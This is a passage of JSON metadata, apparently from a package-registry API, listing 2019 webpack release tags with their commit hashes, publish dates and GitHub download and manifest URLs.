ack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},